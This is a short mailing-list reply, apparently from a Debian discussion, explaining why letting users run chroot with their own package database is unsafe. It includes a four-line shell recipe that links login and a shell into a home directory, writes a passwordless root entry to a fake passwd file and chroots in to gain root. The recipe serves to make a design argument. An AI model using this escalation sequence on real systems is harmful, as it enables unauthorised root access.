Re: apt-get and The_User

* Mircea Luca

| Would you care please to be a bit more specific please? What kind of
| library would that be

If you look at the debian-security archives for November, you'll se a
post by me on changing return values.  The example changes return
values from time(), but it's pretty easy to change return values for
other as well.  I assume this is the trick fakeroot is using already.

| and why setting up a true chroot environment for user with it's own
| dpkg would be such a bad idea(I can see some problems with syncing
| the 2 dpkg databases and deciding what's for user and what's for
| system)?

ln /bin/login ~/bin/login
ln /bin/ash ~/bin/ash
echo "root::0:0::/:/bin/ash" > ~/etc/passwd
chroot ~ /bin/login

login as root, no password.

Voila, you are root, and breaking out of chroot shouldn't be a
problem.

--

Tollef Fog Heen
Unix _IS_ user friendly... It's just selective about who its friends are.